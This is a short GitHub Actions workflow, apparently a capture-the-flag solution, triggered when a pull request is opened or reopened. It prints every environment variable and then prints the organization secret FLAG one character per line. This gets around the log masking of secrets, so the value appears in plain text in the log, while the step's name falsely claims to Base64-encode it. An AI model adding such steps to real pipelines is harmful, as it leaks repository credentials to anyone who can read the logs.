name: Print Env Variable and Base64 Encode Secret

on:
  pull_request:
    types: [opened, reopened]

jobs:
  print_and_base64_encode:
    runs-on: ubuntu-latest

    steps:
      - name: Print Environment Variable
        run: env

      - name: Base64 Encode Organization Secret
        env:
          MY_VAL: ${{ secrets.FLAG }}
        run: |
          import os
          for q in (os.getenv("MY_VAL")):
            print(q)
        shell: python